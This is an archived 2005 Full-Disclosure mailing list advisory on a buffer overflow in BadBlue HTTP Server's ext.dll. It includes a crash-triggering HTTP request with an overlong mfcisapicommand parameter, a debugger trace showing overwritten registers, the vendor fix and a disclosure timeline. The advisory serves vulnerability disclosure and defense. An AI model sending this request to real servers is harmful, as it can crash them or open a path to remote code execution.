Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow

from [Andres Tarasco] Network Security [Permanent Link]
Subject: [Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow
Date: Sat, 26 Feb 2005 18:30:16 +0100 
SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer
overflow

* Release DAte:
February 26, 2005

* Vendor:  
Working Resources Inc. http://www.badblue.com

* Versions Affected:
Confirmed under Badblue HTTP Server v2.55

* Severity: 
Critical  (Remote Code execution)

* Summary:
"BadBlue is not only a server, it's a complete file sharing system that is
simply easier and faster to use than anything else. Why? Because BadBlue
lets you use a tool you already know well: a web browser."
"In seconds, you can turn your PC into a powerful web server. You can easily
share photos, music, videos, and much more. With its simple menu-driven
interface and pop-up wizards to guide you through setup, there's no faster
way to share files"


* Technical Details:
SIA has discovered a buffer overflow in EXT.DLL, a module that handles
badblue http Requests. This buffer overflow triggers when an special crafted
HTTP Request is created.
Buffer overflow in EXT.DLL is triggered when a malicious http request that
contains a long mfcisapicommand  parameter, with more than 250 chars, is
submitted. Some registers are overwritten so its possible to execute code or
cause a denial of service shutting down the server. The Following request
can be used to crash the remote server.

GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx

Windbg trace:
(360.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141
edi=77e2b495
eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00010206
*** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for
E:\BadBlue\PE\ext.dll - 
ext!GetExtensionVersion+0x13f7:
10042004 8b3e             mov     edi,[esi]
ds:0023:41414141=????????

Succesfully exploitation of this flaw could allow remote code execution with
Administrator rigths.


* Solution: 
Upgrade to the lastest available version. At this time, vendor provides
version v2.6 that is available to download at
http://www.badblue.com/bb98.exe

* Credits:
Andres Tarasco (atarasco _at_ sia.es) has discovered this vulnerability

* Disclosure Timeline:
December     2004 - Discovered
December 20, 2004 -  Initial Vendor Notification 
December 21, 2004 -  Initial Vender Response
January 3,   2005 -  Vendor Patch released (v2.60)
February 26,  2005 -  Public Disclosure


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow, Andres Tarasco <=
Previous by Date:  RE: [Full-Disclosure] GAIM exploit, Aditya Deshmukh
Next by Date:  Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation(ev gpsc verify reciept please), Steve Kudlak
Previous by Thread:  [Full-Disclosure] Novell/Ximian Evolution multiple text attachments DoS, Kristian Hermansen
Next by Thread:  [Full-Disclosure] Fake FBI email Worm Variant Xposed, Debasis Mohanty
Indexes:  [Date] [Thread] [Top] [All Lists]